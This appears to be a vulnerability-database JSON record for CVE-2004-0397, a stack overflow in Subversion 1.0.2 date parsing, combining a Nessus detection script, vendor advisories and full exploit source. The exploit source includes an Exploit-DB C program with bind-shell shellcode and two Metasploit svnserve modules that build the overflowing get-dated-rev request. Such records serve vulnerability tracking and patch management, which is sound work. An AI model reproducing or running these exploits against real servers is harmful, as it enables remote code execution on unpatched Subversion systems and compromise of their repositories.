script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"mod_dav_svn-1.0.2-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"subversion-1.0.2-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"subversion-debuginfo-1.0.2-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"subversion-devel-1.0.2-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"subversion-perl-1.0.2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_dav_svn / subversion / subversion-debuginfo / subversion-devel / etc\");\n}\n", 
"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T12:08:13", "description": "Subversion 1.0.2 svn_time_from_cstring() Remote Exploit. CVE-2004-0397. Remote exploit for linux platform", "published": "2004-06-25T00:00:00", "type": "exploitdb", "title": "Subversion 1.0.2 - svn_time_from_cstring Remote Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "modified": "2004-06-25T00:00:00", "id": "EDB-ID:304", "href": "https://www.exploit-db.com/exploits/304/", "sourceData": "/* subversion-1.0.2 exploit by Gyan Chawdhary ... \r\n* exploits a stack overflow in the svn_time_from_cstring() function. We build\r\n* a date format which is valid but at the same time exits after the sscanf \r\n* function, or else it branches into another function which segfaults at the\r\n* apr_pool_t *pool. We overwrite our eip with a pointer to the main *data \r\n* buffer stored in the heap where our shell code is stored in the main request\r\n* itself. This is cause the local stack space for svn_time_from_cstring is \r\n* small. Will bind a shell on 36864 port. Modify it for ur own usage. 
\r\n*\r\n* boring exploit for a boring vulnerability \r\n* Gyan\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n\r\n#define BUF_SIZE ( 1024 * 2 )\r\n#define TRUE 1\r\n#define FALSE 0\r\n#define PORT 3690 /* Default svnserve Port */\r\n#define IP \"127.0.0.1\"\r\n#define CMD \"/bin/uname -a ; id ;\\r\\n\";\r\n\r\nstruct targets {\r\nchar *os;\r\nunsigned int *eip;\r\nunsigned int *shell_nop;\r\n};\r\n\r\n/*struct targets TARGETS[] =\r\n{\r\n{ \"Redhat 8.0 - (Psyche)\", \r\n*/ \r\nchar offset1[] = \"\\x78\\x32\\x06\\x08\"; // 0x8063278 + 88 + 12;\r\nchar offset2[] = \"\\xdc\\x32\\x06\\x08\"; // 0x80632dc\r\n\r\nint sockfd;\r\n\r\nchar request1[] = \"( 2 ( edit-pipeline ) %d:%s )\\n\";\r\n\r\nchar request2[] = \"( ANONYMOUS ( 0: ) )\\n\";\r\n\r\nchar request3[] = \"( get-dated-rev ( 314:aaaaaaaa%saaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%saaaaaaaa%saaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 4 a tttt 16:24:23.111 (day 277, dst 1, gmt_off -18000) ) )\\n\";\r\n\r\nchar request4[] = \"( check-path ( 0: ( 0 ) ) )\\n\";\r\n\r\n\r\n/* p_types */\r\nvoid xp_connect(char *);\r\nchar *build_request(char *);\r\nvoid talk(char *, char *);\r\n\r\n\r\nchar shellcode[] = 
\r\n\"\\xeb\\x72\\x5e\\x29\\xc0\\x89\\x46\\x10\\x40\\x89\\xc3\\x89\\x46\\x0c\"\r\n\"\\x40\\x89\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x43\\xc6\\x46\"\r\n\"\\x10\\x10\\x66\\x89\\x5e\\x14\\x88\\x46\\x08\\x29\\xc0\\x89\\xc2\\x89\"\r\n\"\\x46\\x18\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\\x14\\x89\\x4e\\x0c\"\r\n\"\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\\xb0\\x66\"\r\n\"\\xcd\\x80\\x89\\x56\\x0c\\x89\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\"\r\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\\x3f\\x41\\xcd\\x80\\xb0\\x3f\"\r\n\"\\x41\\xcd\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\\xf3\\x8d\\x4b\\x0c\"\r\n\"\\xb0\\x0b\\xcd\\x80\\xe8\\x89\\xff\\xff\\xff/bin/sh\";\r\n\r\n\r\nvoid xp_connect(char *ip)\r\n{\r\n// int sockfd;\r\nstruct sockaddr_in s;\r\nchar buffer[1024];\r\nchar temp[1024];\r\nint tmp;\r\n\r\ns.sin_family = AF_INET;\r\ns.sin_port = htons(PORT);\r\ns.sin_addr.s_addr = inet_addr(IP);\r\n\r\nif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n{\r\nprintf(\"Cannot create socket\\n\");\r\nexit(-1);\r\n}\r\n\r\nif((connect(sockfd,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)\r\n{\r\nprintf(\"Cannot connect()\\n\");\r\nexit(-1);\r\n}\r\nmemset(temp, '\\0', sizeof(temp));\r\ntmp = recv(sockfd,temp,1024,0);\r\n\r\n}\r\n\r\nvoid talk(char *ip, char *repo)\r\n{\r\nchar buffer[1024], request[1024], tmp[512];\r\nstatic char string[] = \"svn://%s/%s\";\r\nint size;\r\nchar *str;\r\n\r\nsprintf(buffer, string, ip, repo);\r\nsize = strlen(buffer);\r\nsprintf(request, request1, size, buffer);\r\n\r\nxp_connect(ip);\r\n\r\nif (send(sockfd, request, strlen(request), 0) < 0)\r\n{\r\nprintf(\"send() failed\\n\");\r\nexit(-1);\r\n}\r\nrecv(sockfd, tmp, 512, 0);\r\n\r\nif (send(sockfd, request2, strlen(request2), 0) < 0)\r\n{\r\nprintf(\"send() failed\\n\");\r\nexit(-1);\r\n}\r\nrecv(sockfd, tmp, 512, 0);\r\n\r\nstr = build_request(shellcode);\r\n\r\nif(write (sockfd, str, strlen(str)) < 0)\r\n{\r\nprintf(\"write() 
failed\\n\");\r\nexit(-1);\r\n}\r\n\r\nclose(sockfd);\r\n//connect_target();\r\n}\r\n\r\n\r\n\r\nchar *build_request(char *sc)\r\n{\r\nchar *buffer, *ptr;\r\nbuffer = (char *)malloc(1024);\r\nptr = buffer;\r\nsprintf(ptr, request3, offset1, offset2, sc);\r\n\r\nreturn buffer;\r\n}\r\n\r\n\r\n\r\nmain(int argc, char **argv)\r\n{\r\ntalk(IP, \"cool\");\r\n}\r\n\r\n// milw0rm.com [2004-06-25]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/304/"}, {"lastseen": "2016-02-01T11:34:02", "description": "Subversion 1.0.2 Date Overflow. CVE-2004-0397. Remote exploits for multiple platform", "published": "2004-05-19T00:00:00", "type": "exploitdb", "title": "Subversion 1.0.2 - Date Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "modified": "2004-05-19T00:00:00", "id": "EDB-ID:9935", "href": "https://www.exploit-db.com/exploits/9935/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/http'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Brute\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Subversion Date Svnserve',\r\n\t\t\t'Description' => %q{\r\n This is an exploit for the Subversion date parsing overflow. This\r\n exploit is for the svnserve daemon (svn:// protocol) and will not work\r\n for Subversion over webdav (http[s]://). 
This exploit should never\r\n crash the daemon, and should be safe to do multi-hits.\r\n\r\n **WARNING** This exploit seems to (not very often, I've only seen\r\n it during testing) corrupt the subversion database, so be careful!\r\n\t\t\t},\r\n\t\t\t'Author' => 'spoonm',\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t \t['CVE', '2004-0397'],\r\n\t\t\t\t\t['OSVDB', '6301'],\r\n\t\t\t\t\t['BID',\t'10386'],\r\n\t\t\t\t\t['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],\r\n\t\t\t\t\t['MIL', '68'],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 500,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\",\r\n\t\t\t\t\t'MinNops' => 16,\r\n\t\t\t\t},\t\r\n\t\t\t'SaveRegisters' => [ 'esp' ],\r\n\t\t\t'Arch' => 'x86',\r\n\t\t\t'Platform' => [ 'linux', 'bsd' ],\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[ \r\n\t\t\t\t\t\t'Linux Bruteforce',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xbffffe13 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 0\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ \r\n\t\t\t\t\t\t'FreeBSD Bruteforce',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'bsd',\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xbfbffe13 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfbf0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 0\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 19 2004'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3690),\t\r\n\t\t\t\tOptString.new('URL', [ true, \"SVN URL (ie svn://host/repos)\", \"svn://host/svn/repos\" ])\r\n\t\t\t], self.class)\r\n\t\r\n\t\tregister_advanced_options(\r\n\t\t\t[\r\n\t\t\t\t# 62 on spoonm's, 88 on 
HD's\r\n\t\t\t\tOptInt.new('RetLength', [ false, \"Length of rets after payload\", 100 ]),\r\n\t\t\t\tOptBool.new('IgnoreErrors', [ false, \"Ignore errors\", false ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\tend\r\n\r\n\tdef brute_exploit(addresses)\r\n\t\tconnect\r\n\t\t\r\n\t\tprint_status(\"Trying #{\"%.8x\" % addresses['Ret']}...\")\r\n\r\n\t\tbuffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded\r\n\t\t\r\n\t\t[\r\n\t\t\t\"( 2 ( edit-pipeline ) \" + lengther(datastore['URL']) + \" ) \",\r\n\t\t\t\"( ANONYMOUS ( 0; ) )\",\r\n\t\t\t\"( get-dated-rev ( \" + lengther(buffer + \" 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)\") + \" ) ) \"\r\n\t\t].each_with_index { |buf, index|\r\n\t\t\ttrash = sock.get_once\r\n\r\n\t\t\tprint_line(\"Received: #{trash}\") if debugging?\r\n\t\t\t\r\n\t\t\tif (sock.put(buf) || 0) == 0 and index < 3\r\n\t\t\t\tprint_error(\"Error transmitting buffer.\")\r\n\t\t\t\traise ExploitError, \"Failed to transmit data\" if !datastore['IgnoreErrors']\r\n\t\t\tend\r\n\r\n\t\t\tif index == 3 and trash.length > 0\r\n\t\t\t\tprint_error(\"Received data when we shouldn't have\")\r\n\t\t\t\traise ExploitError, \"Received data when it wasn't expected\" if !datastore['IgnoreErrors']\r\n\t\t\tend\r\n\t\t}\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\tdef lengther(buf)\r\n\t\t\"#{buf.length}:\" + buf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9935/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "cvelist": ["CVE-2004-0397"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n e-matters GmbH\r\n www.e-matters.de\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: Subversion remote vulnerability\r\n Release Date: 2004/05/19\r\nLast Modified: 2004/05/19\r\n Author: Stefan Esser 
[s.esser@e-matters.de]\r\n\r\n Application: Subversion <= 1.0.2\r\n Severity: A vulnerability within Subversion allows remote \r\n compromise of Subversion servers.\r\n Risk: Critical\r\nVendor Status: Vendor is releasing a bugfixed version.\r\n Reference: http://security.e-matters.de/advisories/082004.html\r\n\r\n\r\nOverview:\r\n\r\n Quote from: http://subversion.tigris.org\r\n \r\n "The goal of the Subversion project is to build a version control system \r\n that is a compelling replacement for CVS in the open source community. \r\n The software is released under an Apache/BSD-style open source license.\r\n \r\n Features of Subversion\r\n \r\n * Most current CVS features\r\n * Directories, renames, and file meta-data are versioned\r\n * Commits are truly atomic\r\n * Apache network server option, with WebDAV/DeltaV protocol\r\n * Standalone server option\r\n * Branching and tagging are cheap (constant time) operations\r\n * Natively client/server, layered library design\r\n * Client/server protocol sends diffs in both directions\r\n * Costs are proportional to change size, not data size\r\n * Efficient handling of binary files\r\n * Parseable output"\r\n \r\n Subversion versions up to 1.0.2 are vulnerable to a date parsing \r\n vulnerability which can be abused to allow remote code execution\r\n on Subversion servers and therefore could lead to a repository\r\n compromise.\r\n \r\n \r\nDetails:\r\n \r\n Similar to the libneon issue a manual scan for common programming errors\r\n revealed an unsafe call to sscanf() in one of Subversions date parsing\r\n functions.\r\n \r\n When Subversions tries to convert a string into an apr_time_t it falls\r\n back to the vulnerable sscanf() to decode old-styled date strings.\r\n This function is exposed to an external attacker through a DAV2 REPORT\r\n query or a get-dated-rev svn-protocol command.\r\n \r\n Both ways have been proven exploitable, but exploiting through the\r\n DAV2 protocol is somewhat harder because the date 
string has to be\r\n in utf-8 format. On the other hand exploiting through the svn-protocol\r\n is a trivial standard stackoverflow with the exception that whitespace\r\n and the '\0' character is forbidden.\r\n \r\n And as a sidenotice: Exploiting this stackoverflow is even possible\r\n when Propolice or similar protections are in place because a lot of\r\n fancy things can be done by overwriting the function parameters.\r\n \r\n\r\nProof of Concept:\r\n\r\n e-matters is not going to release an exploit for this vulnerability to\r\n the public.\r\n \r\n\r\nDisclosure Timeline:\r\n\r\n 02. May 2004 - Subversion developers and vendor-sec were notified \r\n by email\r\n 03. May 2004 - Subversion vendor started their own analysis of the issue\r\n and started compiling a list of big repositories to\r\n receive pre-notifications\r\n 11. May 2004 - Big subversion repositories (not already contacted\r\n through vendor-sec) got pre-notified \r\n 19. May 2004 - Coordinated Public Disclosure\r\n\r\n \r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-0397 to this issue.\r\n\r\n\r\nRecommendation:\r\n\r\n Exploiting this vulnerability on not heavily protected servers is trivial\r\n even for beginners, therefore it is strongly recommended to update\r\n immediately. Even Propolice users aren't safe because overwriting function\r\n arguments allows some fancy exploits.\r\n \r\n \r\nGPG-Key:\r\n\r\n http://security.e-matters.de/gpg_key.asc\r\n \r\n pub 1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam \r\n Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA A71A 6F7D 572D 3004 C4BC\r\n\r\n\r\nCopyright 2004 Stefan Esser. 
All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFAqV5Ib31XLTAExLwRAjb6AJ9r+ji0jpYK+idA5Gj3IDRsoLAcFwCgyr2m\r\nk5m7y6DFOS30aAfJs1p58v8=\r\n=Ct/a\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n-- \r\n\r\n--------------------------------------------------------------------------\r\n Stefan Esser s.esser@e-matters.de\r\n e-matters Security http://security.e-matters.de/\r\n\r\n GPG-Key gpg --keyserver pgp.mit.edu --recv-key 0xCF6CAE69 \r\n Key fingerprint B418 B290 ACC0 C8E5 8292 8B72 D6B0 7704 CF6C AE69\r\n--------------------------------------------------------------------------\r\n Did I help you? Consider a gift: http://wishlist.suspekt.org/\r\n--------------------------------------------------------------------------\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "modified": "2004-05-19T00:00:00", "published": "2004-05-19T00:00:00", "id": "SECURITYVULNS:DOC:6239", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6239", "title": "[Full-Disclosure] Advisory 08/2004: Subversion remote vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:06", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0397"], "description": "### Background\n\nSubversion is a version control system intended to eventually replace CVS. Like CVS, it has an optional client-server architecture (where the server can be an Apache server running mod_svn, or an ssh program as in CVS's :ext: method). In addition to supporting the features found in CVS, Subversion also provides support for moving and copying files and directories. \n\n### Description\n\nAll releases of Subversion prior to 1.0.3 have a vulnerability in the date-parsing code. 
This vulnerability may allow denial of service or arbitrary code execution as the Subversion user. Both the client and server are vulnerable, and write access is NOT required to the server's repository. \n\n### Impact\n\nAll servers and clients are vulnerable. Specifically, clients that allow other users to write to administrative files in a working copy may be exploited. Additionally all servers (whether they are httpd/DAV or svnserve) are vulnerable. Write access to the server is not required; public read-only Subversion servers are also exploitable. \n\n### Workaround\n\nThere is no known workaround at this time. All users are encouraged to upgrade to the latest available version. \n\n### Resolution\n\nAll Subversion users should upgrade to the latest stable version: \n \n \n # emerge sync\n \n # emerge -pv \">=dev-util/subversion-1.0.3\"\n # emerge \">=dev-util/subversion-1.0.3\"", "edition": 1, "modified": "2006-05-22T00:00:00", "published": "2004-05-20T00:00:00", "id": "GLSA-200405-14", "href": "https://security.gentoo.org/glsa/200405-14", "type": "gentoo", "title": "Buffer overflow in Subversion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "description": "**Name**| svndate \n---|--- \n**CVE**| CVE-2004-0397 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Subversion <= 1.0.2 utf-8 Apache2/WebDAV stack vs. 
heap exploit \n**Notes**| CVE Name: CVE-2004-0397 \nVENDOR: Collabnet \nOSVDB: http://osvdb.org/displayvuln.php?osvdb_id=6301 \nRepeatability: Multiple tries \nReferences: http://security.e-matters.de/advisories/082004.html \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0397 \nDate public: 2004/05/19 \n\n", "edition": 2, "modified": "2004-07-07T04:00:00", "published": "2004-07-07T04:00:00", "id": "SVNDATE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/svndate", "type": "canvas", "title": "Immunity Canvas: SVNDATE", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:16", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0397"], "description": "\nStefan Esser reports:\n\nSubversion versions up to 1.0.2 are vulnerable to a date\n\t parsing vulnerability which can be abused to allow remote\n\t code execution on Subversion servers and therefore could\n\t lead to a repository compromise.\n\nNOTE: This vulnerability is similar to the date\n\t parsing issue that affected neon. However, it is a different\n\t and distinct bug.\n", "edition": 4, "modified": "2004-05-19T00:00:00", "published": "2004-05-19T00:00:00", "id": "5D36EF32-A9CF-11D8-9C6D-0020ED76EF5A", "href": "https://vuxml.freebsd.org/freebsd/5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a.html", "title": "subversion date parsing vulnerability", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-18T01:02:35", "description": "This is an exploit for the Subversion date parsing overflow. This exploit is for the svnserve daemon (svn:// protocol) and will not work for Subversion over webdav (http[s]://). This exploit should never crash the daemon, and should be safe to do multi-hits. 
**WARNING** This exploit seems to (not very often, I've only seen it during testing) corrupt the subversion database, so be careful!\n", "published": "2007-01-05T06:36:26", "type": "metasploit", "title": "Subversion Date Svnserve", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/SVN/SVNSERVE_DATE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/http/client'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Brute\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Subversion Date Svnserve',\n 'Description' => %q{\n This is an exploit for the Subversion date parsing overflow. This\n exploit is for the svnserve daemon (svn:// protocol) and will not work\n for Subversion over webdav (http[s]://). 
This exploit should never\n crash the daemon, and should be safe to do multi-hits.\n\n **WARNING** This exploit seems to (not very often, I've only seen\n it during testing) corrupt the subversion database, so be careful!\n },\n 'Author' => 'spoonm',\n 'References' =>\n [\n ['CVE', '2004-0397'],\n ['OSVDB', '6301'],\n ['BID',\t'10386'],\n ['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html']\n ],\n 'Payload' =>\n {\n 'Space' => 500,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\",\n 'MinNops' => 16,\n },\n 'SaveRegisters' => [ 'esp' ],\n 'Arch' => 'x86',\n 'Platform' => %w{ bsd linux },\n 'Targets' =>\n [\n [\n 'Linux Bruteforce',\n {\n 'Platform' => 'linux',\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xbffffe13 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 0\n }\n },\n ],\n [\n 'FreeBSD Bruteforce',\n {\n 'Platform' => 'bsd',\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xbfbffe13 },\n 'Stop' => { 'Ret' => 0xbfbf0000 },\n 'Step' => 0\n }\n },\n ],\n\n ],\n 'DisclosureDate' => 'May 19 2004'))\n\n register_options(\n [\n Opt::RPORT(3690),\n OptString.new('URL', [ true, \"SVN URL (ie svn://host/repos)\", \"svn://host/svn/repos\" ])\n ])\n\n register_advanced_options(\n [\n # 62 on spoonm's, 88 on HD's\n OptInt.new('RetLength', [ false, \"Length of rets after payload\", 100 ]),\n OptBool.new('IgnoreErrors', [ false, \"Ignore errors\", false ])\n ])\n end\n\n def brute_exploit(addresses)\n connect\n\n print_status(\"Trying #{\"%.8x\" % addresses['Ret']}...\")\n\n buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded\n\n [\n \"( 2 ( edit-pipeline ) \" + lengther(datastore['URL']) + \" ) \",\n \"( ANONYMOUS ( 0; ) )\",\n \"( get-dated-rev ( \" + lengther(buffer + \" 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)\") + \" ) ) \"\n ].each_with_index { |buf, index|\n trash = sock.get_once\n\n print_line(\"Received: #{trash}\") if debugging?\n\n if (sock.put(buf) || 0) == 0 and index < 
3\n print_error(\"Error transmitting buffer.\")\n fail_with(Failure::Unknown, \"Failed to transmit data\") if !datastore['IgnoreErrors']\n end\n\n if index == 3 and trash.length > 0\n print_error(\"Received data when we shouldn't have\")\n fail_with(Failure::Unknown, \"Received data when it wasn't expected\") if !datastore['IgnoreErrors']\n end\n }\n\n handler\n disconnect\n end\n\n def lengther(buf)\n \"#{buf.length}:\" + buf\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/svn/svnserve_date.rb"}], "suse": [{"lastseen": "2016-09-04T11:40:16", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0397", "CVE-2004-0396", "CVE-2004-0398"], "description": "The Concurrent Versions System (CVS) offers tools which allow developers to share and maintain large software projects. Stefan Esser reported buffer overflow conditions within the cvs program. They allow remote attackers to execute arbitrary code as the user the cvs server runs as. Since there is no easy workaround we strongly recommend to update the cvs package.", "edition": 1, "modified": "2004-05-19T11:10:20", "published": "2004-05-19T11:10:20", "id": "SUSE-SA:2004:013", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-05/msg00008.html", "title": "remote command execution in cvs", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}